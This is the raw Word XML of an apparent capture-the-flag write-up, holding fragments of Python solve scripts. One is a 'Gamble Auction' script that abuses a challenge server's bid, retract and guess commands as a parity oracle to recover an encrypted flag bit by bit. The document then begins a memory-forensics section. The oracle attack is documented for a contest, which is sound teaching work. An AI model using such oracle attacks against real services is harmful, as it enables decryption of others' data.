    <w:p w14:paraId="14A83AC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flag_match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search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'ECSC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\{[^}]+\}'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final_response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4E2C0E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flag_match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A0E252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"SUCCESS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! FLAG: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flag_match.group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(0)}"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BB3D920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</w:p>
    <w:p w14:paraId="6D9D94E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5166AB40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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception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AC492C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"Connection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might be closed: {e}"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2400F60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E9A8DF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If single connection </w:t>
      </w:r>
      <w:proofErr w:type="gram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failed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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, try reconnecting with </w:t>
      </w:r>
      <w:proofErr w:type="gram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the </w:t>
      </w:r>
      <w:proofErr w:type="spell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magic</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_ct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A464B5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"Trying with new connection..."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5C57BC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close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0429A6E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CF5D00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AF_INET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SOCK_STREAM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D3B698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connect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host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port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3B4C1B9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1CC190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119.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DE8BD7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Skip </w:t>
      </w:r>
      <w:proofErr w:type="gram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banner</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24BA5B2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0.5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C487D0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4096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3F056E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643611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Send option 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F19D6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'2\n'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D2F7824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120D81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1024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Read prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640FC4F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C0468A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129.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Send the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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we found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F14E6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"Sending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to new connection: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magic_ct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94193A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magic_ct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encode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'\n'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3CAF85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0.5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CA5E6B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38FD9E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Read response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A78FA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final_response2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</w:p>
    <w:p w14:paraId="473F6CA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7386B8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A83107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chunk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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1024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11B4B99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139.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final_response2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2FE00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'ECSC{'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final_response2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AB3711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61078BA6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timeout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98553E4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">143.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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF043F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E6B66F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"Final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response from new connection: {final_response2}"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959F99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BC8998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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Look for flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B6A60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flag_match</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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search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'ECSC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\{[^}]+\}'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final_response2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F0D7B5F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149.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flag_match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342B0E5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"SUCCESS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! FLAG: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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flag_match.group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(0)}"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08922A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151.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8040662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"Still no flag found"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D75DF01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DF8F784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154.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sock2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close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133C47BE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155.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0A98EDC3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156.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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception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7E60BFC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157.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"Error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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: {e}"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F669A97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158.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traceback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4556BD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159.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traceback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print_exc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251D803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160.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7CD1CAA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161. </w:t>
      </w:r>
      <w:r w:rsidRPr="001C599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__name__ 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C5997">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r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2D19FA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162.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solve_challenge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C599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0EE72AFB" w14:textId="77777777" w:rsidR="001C5997" w:rsidRPr="001C5997" w:rsidRDefault="001C59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61130"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5997">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">163. </w:t>
      </w:r>
      <w:r w:rsidRPr="001C599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1C668A9" w14:textId="77777777" w:rsidR="001C5997" w:rsidRDefault="001C5997" w:rsidP="001C5997">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6120B8C8" w14:textId="18665BE1" w:rsidR="001C5997" w:rsidRPr="001C5997" w:rsidRDefault="001C5997" w:rsidP="001C5997">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5997">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After running the script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74023371" w14:textId="5EC3FD34" w:rsidR="001C5997" w:rsidRDefault="001C5997" w:rsidP="001C5997">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5997">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DF64672" wp14:editId="5E1B777E">
            <wp:extent cx="4629796" cy="3877216"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="792266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660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7D85" w14:textId="77777777" w:rsidR="001C5997" w:rsidRPr="001C5997" w:rsidRDefault="001C5997" w:rsidP="001C5997">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69847590" w14:textId="3D4E642C" w:rsidR="0018145A" w:rsidRDefault="0018145A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3" w:name="_Toc203244051"/>
      <w:r w:rsidRPr="0018145A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gamble Auction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="042CBE1D" w14:textId="239448B1" w:rsidR="009166C5" w:rsidRPr="009166C5" w:rsidRDefault="009166C5" w:rsidP="009166C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009166C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691DB11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1.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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320924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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0397B6F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52ABB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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7491AB9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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136FED1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7E63D6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HOST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challenge.hackthat.site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</w:p>
    <w:p w14:paraId="66CD7F6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PORT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35182</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749DE2C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BITS_PER_CHUNK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10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</w:p>
    <w:p w14:paraId="6812650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CHUNK_SIZE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10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10 bytes per chunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BBA5B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DD189A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12.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send_recv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cmd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pause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retries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3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A9B285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"""Send command and receive response with better error handling"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D671C1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attempt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retries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67ADAF0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D21092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sendall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cmd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encode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'\n'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7699E1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pause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9E2F90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53775F9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Try to receive data multiple times to get complete response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C42C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response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76BBD63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start_time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1F14EB3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start_time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2.0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2 second timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00909FE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752611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data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8192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E638DD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C45584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response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</w:p>
    <w:p w14:paraId="5B58A09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Check if we got a complete response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214AF6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'\n'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response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response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100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E9A866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29.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29239C1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628542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timeout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430692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303EDDF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76D68D5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response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FFA4F4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response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0C021A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45D7A26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37</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009166C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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proofErr w:type="gram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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception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C7D9BE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Communication error (attempt {attempt+1}): {e}"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9D4163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attempt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retries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864EF2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0.5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337ADC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A12290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raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD79F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70FCD30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</w:p>
    <w:p w14:paraId="2E383BF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E6026D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wait_for_stability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seconds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0.5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9BF49A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"""Wait and clear any pending data"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A021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seconds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5AFAF9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FF0B96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1068EE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3A5C50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data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8192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984A0D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01A54C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0D32605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timeout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0A760A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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10337D2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finally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254852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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 58.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F84F00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9F9F61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main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1563BD1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s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2E5A975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46CB8F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A01168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6CA0C5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connect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HOST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PORT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2049250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Connected to server"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11E3DD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7036E85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Read initial </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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prompt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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with multiple attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D761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initial_data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3928AB5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684332E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503B3A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data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4096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A0F3C2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5833FA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initial_data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</w:p>
    <w:p w14:paraId="372E500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'\n'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6BFD16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07D198F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timeout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EE5095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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3A2B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7A575E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1AA218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initial_data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56D5DBE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wait_for_stability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561801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87C9A8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Get public key parameters with retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41C7A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n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g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6995F10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attempt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84C16F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Attempting to get public key info (attempt {attempt+1})..."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A1B07B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info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send_recv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"info"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pause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0.3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A047BA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89.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"[DEBUG] Info response: {info[:200]}..."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907C28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39BDA1B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n_match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search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'Public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Key \(n\):\s*(\d+)'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info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AF27F3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g_match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search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'Generator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\(g\):\s*(\d+)'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info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4082E1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48DDD80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n_match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g_match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1B5D8B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n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n_match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group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3848B41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g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g_match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group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5831794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Successfully extracted: n={n}, g={g}"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D0655A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7710149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EF2147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Failed to extract public key parameters, retrying..."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807AA3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wait_for_stability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91AC8E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39AA24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is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g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is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E5085D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Could not extract public key parameters"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22C43B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</w:p>
    <w:p w14:paraId="672F2B9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17A8CEE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n2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</w:p>
    <w:p w14:paraId="42151AA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EAB4F4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Calculate modular </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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inverse</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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of 2 more safely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0C565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D5A213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inv2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5BA6A9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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ValueError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B97201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Fallback using extended </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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euclidean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB7871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extended_gcd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EC5A08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lastRenderedPageBreak/>
        <w:t xml:space="preserve">115.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EABE63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63AB5B9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gcd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y1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extended_gcd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b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FE49B2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x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y1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b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// a) * x1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401FDF1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119.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y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x1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF0FC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gcd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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC767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73E9B02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gcd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y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extended_gcd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71700A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gcd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8822EF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"[!] 2 and n are not coprime! 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gcd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=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gcd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5516B9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</w:p>
    <w:p w14:paraId="0F99450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inv2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</w:p>
    <w:p w14:paraId="05F9770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E5839C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inv2 = {inv2}"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9AE941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129.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2974F52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Get initial ciphertexts for all items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE949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Getting item list..."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9C8400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list_output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send_recv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"list"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pause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0.3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24C083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"[DEBUG] List output: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list_output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[:300]}..."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9E49D2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726E5D6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items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0F01152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line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list_output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splitlines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3795349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'- Item ID'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line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':'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20F39E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D2D43D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139.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line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split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':'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)[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].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strip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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C90386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items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3D0316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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ValueError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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IndexError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50393B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Error parsing line: {line}, error: {e}"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54754E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C92332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Found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len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(items)} items: {items}"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FC179B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C6863A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items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BC42AF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No items found!"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FB197D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</w:p>
    <w:p w14:paraId="7B1A862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149.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399030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flag_chunks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6015BF0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D4ED5D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item_id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c0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enumerate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items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146FB3C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"\n[*] Recovering chunk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item_id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 (initial ciphertext: {c0})..."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C5115D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current_c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c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBEA6B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bits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460E0E9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2451E67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bit_i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BITS_PER_CHUNK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502F42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Extracting bit {bit_i+1}/{BITS_PER_CHUNK}..."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D5DCB0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159.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6243527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Reset </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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item</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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to initial ciphertext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF878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retract_resp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send_recv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"retract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item_id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pause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DBF404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"[DEBUG] Retract response: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retract_resp.strip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()}"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D10BAE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05DF201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Compute bid to set ciphertext to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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current_c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BDEC2A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BDF937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inv_c0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B29C2B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x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current_c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inv_c0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n2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F583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168. </w:t>
      </w:r>
      <w:proofErr w:type="gram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proofErr w:type="gram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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ValueError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9892F1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">169.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Error computing modular inverse: {e}"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EE08D2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7792E38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5930C41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bid_resp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send_recv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"bid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item_id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 {x}"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pause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EE0340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"[DEBUG] Bid response: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bid_resp.strip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()}"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A38997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2863D7B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Guess parity "even"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957B33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guess_resp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send_recv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"guess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item_id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 even"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pause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4832B1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"[DEBUG] Guess response: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guess_resp.strip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()}"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7199AC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3C529FD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179.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Determine parity </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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from response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA46F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"Correct guess"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guess_resp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"correct"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guess_resp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lower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1310EEA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b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even</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA0921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A10C41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b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odd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603F4A0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77078D5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7C60F2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Bit {bit_i+1:02d}: {b}"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4414A21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57C5958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Compute E(-b) = g^(-b mod n) mod n^2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207199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189.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a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(-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</w:p>
    <w:p w14:paraId="756D87C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5FDBF0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E_a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7296F13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3B0E49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E_a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g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43E100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6BFAC07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Update ciphertext for next bit: (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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current_c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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* E(-b))^(inv2) mod n^2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB5F40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temp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current_c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E_a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n2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185FEBA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current_c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pow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temp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inv2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n2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2DFBB6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4C2573E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199.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Add small delay to avoid overwhelming the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DC26B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sleep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0.1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FC5B3AA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1E8A464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Convert bits to bytes (assuming LSB first)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7744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m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</w:p>
    <w:p w14:paraId="4DF58BA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enumerate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FFAA1A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m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|=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&lt;&lt;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</w:p>
    <w:p w14:paraId="2D17D79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06B75D0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Convert to bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377C75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526C4C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209.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full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m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to_bytes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CHUNK_SIZE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'big'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B58937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chunk_bytes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full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lstrip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'\x00'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01CF48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Recovered chunk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item_id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chunk_bytes!r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1DE75E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flag_chunks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chunk_bytes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E5EE17C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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OverflowError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8FD2A7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Error converting bits to bytes for chunk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item_id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352D79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flag_chunks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C25BD2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ED77B5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"\n[*] Recovered chunks:"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BA33BC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enumerate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flag_chunks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103826B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219.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"Chunk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i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chunk!r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5321EE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7ED7AD3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"\n[*] Combined raw bytes:"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31D5DD7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">222.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flag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join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flag_chunks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8A5DDF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"Raw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flag</w:t>
      </w:r>
      <w:proofErr w:type="gram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!r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</w:t>
      </w:r>
      <w:proofErr w:type="gram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E404269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240AA8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Try to decode as text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA1A6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B35130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227.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decoded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E27D34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"Decoded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: {decoded}"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8E21036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229.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39495E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"Could not decode as UTF-8"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6486250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01F0804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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Try to find flag pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275651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flag_str</w:t>
      </w:r>
      <w:proofErr w:type="spell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CB388D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'flag{'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flag_str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lower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htb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{'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flag_str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lower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3E9538AD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235.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"[*] Potential flag found: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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flag_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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DAC2D5F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236.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1557E4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>237</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009166C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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proofErr w:type="gramEnd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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception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D9A7C8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238.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"[!] Error: {e}"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4067C8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239.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traceback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3E47E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240.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traceback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print_exc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1CC17803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241.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525D472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242.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finally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53EC95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243.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close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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49A801CB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244. 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D59B7A4" w14:textId="77777777" w:rsidR="009166C5" w:rsidRPr="009166C5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9166C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">245. </w:t>
      </w:r>
      <w:r w:rsidRPr="009166C5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__name__ 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9166C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166C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="009166C5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5E6E1D4" w14:textId="77777777" w:rsidR="009166C5" w:rsidRPr="00086989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086989">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">246. </w:t>
      </w:r>
      <w:r w:rsidRPr="000869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main</w:t>
      </w:r>
      <w:r w:rsidRPr="00086989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05722DED" w14:textId="77777777" w:rsidR="009166C5" w:rsidRPr="00086989" w:rsidRDefault="0091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121505"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086989">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">247. </w:t>
      </w:r>
      <w:r w:rsidRPr="00086989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143138E" w14:textId="77777777" w:rsidR="009166C5" w:rsidRDefault="009166C5" w:rsidP="009166C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F1D7F6" w14:textId="09B48B83" w:rsidR="009166C5" w:rsidRPr="009166C5" w:rsidRDefault="009166C5" w:rsidP="009166C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009166C5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After running for like 10-15 minutes it gave the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78521096" w14:textId="77777777" w:rsidR="00BF377F" w:rsidRDefault="00BF377F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11B38EE9" w14:textId="4FE7526D" w:rsidR="0018145A" w:rsidRDefault="002A437D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4" w:name="_Toc203244052"/>
      <w:r w:rsidRPr="00C05876">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Forensics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0C19376A" w14:textId="77777777" w:rsidR="002E1E37" w:rsidRPr="002E1E37" w:rsidRDefault="002E1E37" w:rsidP="002E1E37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DDB58A" w14:textId="6FA65AF0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5" w:name="_Toc203244053"/>
      <w:r w:rsidRPr="00A513EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Volatile Expert Pt. 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="38EE1133" w14:textId="597D2D32" w:rsidR="002E1E37" w:rsidRPr="002E1E37" w:rsidRDefault="002E1E37" w:rsidP="002E1E37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1E37">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Opened the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E1E37">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mem.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E1E37">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file using notepad and found the version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39246C77" w14:textId="20398A07" w:rsidR="002E1E37" w:rsidRDefault="002E1E37" w:rsidP="002E1E37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1E37">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A7103A9" wp14:editId="538E6CB5">
            <wp:extent cx="4496427" cy="704948"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7783231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3115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5319" w14:textId="49B77BDB" w:rsidR="00490371" w:rsidRDefault="002D099B" w:rsidP="002E1E37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490371">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then I</w:t>
      </w:r>
      <w:r w:rsidR="00490371" w:rsidRPr="00490371">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tried to find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00490371" w:rsidRPr="00490371">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vmlinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00490371" w:rsidRPr="00490371">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> needed online but no luck </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00490371" w:rsidRPr="00490371">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00490371" w:rsidRPr="00490371">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> started searching on terminal using ChatGPT.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> After lots of tries and after breaking the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, I finally found the correct command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9DE7A0" w14:textId="31BA6790" w:rsidR="002D099B" w:rsidRDefault="002D099B" w:rsidP="002E1E37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D099B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5723BF9A" wp14:editId="4167B820">
            <wp:extent cx="5274310" cy="850265"/>
